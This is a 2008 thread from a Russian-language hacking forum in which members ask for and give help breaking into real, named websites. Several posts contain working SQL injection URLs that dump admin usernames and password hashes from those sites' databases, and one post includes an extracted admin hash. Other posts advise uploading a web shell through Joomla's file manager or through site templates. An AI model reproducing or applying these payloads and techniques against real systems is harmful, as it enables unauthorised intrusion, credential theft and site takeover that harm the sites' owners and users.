HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.08.2008, 03:48
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию

Цитата:
Сообщение от truelamer  
Всем прива!
Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))
Если ты суперадмин, то можешь залить шелл через joomla xplorer (в папку images можешь сразу лить, т.к. там права 777 стоят) и потом гуляй по директориям
 
Ответить с цитированием

  #2  
Старый 20.08.2008, 18:35
SiemX
Новичок
Регистрация: 18.08.2008
Сообщений: 5
С нами: 9331623

Репутация: 3
По умолчанию

Помогите заюзать скюль инекцию и вытащить пас админа
 
Ответить с цитированием

  #3  
Старый 20.08.2008, 18:36
SiemX
Новичок
Регистрация: 18.08.2008
Сообщений: 5
С нами: 9331623

Репутация: 3
По умолчанию

тему я создал, но там никто не помог
 
Ответить с цитированием

  #4  
Старый 20.08.2008, 19:15
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

http://release.master.dcms.su/info.php?id=1

$id=intval($anket);

имхо скулы нет, intval() - переводит в число без точки так что только числа а ими скулу не сделаешь)

Последний раз редактировалось truelamer; 20.08.2008 в 19:20..
 
Ответить с цитированием

  #5  
Старый 22.08.2008, 02:06
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
Cool

Вопрос как моно воспользоваться вот этим?

http://rk-triada.ru//d8cms/admin_themes/

И где моно найти ифу про cms nextweb и её уязвимости ,,??

Ивобще у этого сайта http://rk-triada.ru/ что нет уязвимости??? Лично я проверил вроде на все что знаю!

(заранее спасибо)

Последний раз редактировалось geforce; 22.08.2008 в 03:08..
 
Ответить с цитированием

  #6  
Старый 22.08.2008, 02:56
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

никак,просто права на диру не правильно стоят
 
Ответить с цитированием

  #7  
Старый 22.08.2008, 03:18
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию

Есть такой сайт http://www.modvlad.ru/

зделал такое http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users+limit+0.1/*

но это только дял форума! как посмотреть всё что есть в базе? И моно залить туду шелл? И если моно то как?
 
Ответить с цитированием

  #8  
Старый 22.08.2008, 03:40
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

geforce
вот так смотри все таблы..
Цитата:
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables/*
вот правельная база от форума..
Цитата:
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,333,444,concat_ws(0x3a,user name,user_password),666+from+phpbb3_users+where+us er_id=2/*
Administrator:$H$9uIjBNujsrtCkk2HuMQPADk9w.i4Mr/
осталось разшифровать.. и залить шелл через темплейты)
 
Ответить с цитированием

  #9  
Старый 22.08.2008, 05:53
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию

А вот деся как мне залить shell???

http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+4,1/*

Последний раз редактировалось geforce; 22.08.2008 в 06:31..
 
Ответить с цитированием

  #10  
Старый 22.08.2008, 06:25
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

geforce
если есть пасс от админки то разшифруй... и войди в место входа)) а потом уже смотри Залить или не Залить )

Последний раз редактировалось sabe; 22.08.2008 в 07:25..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.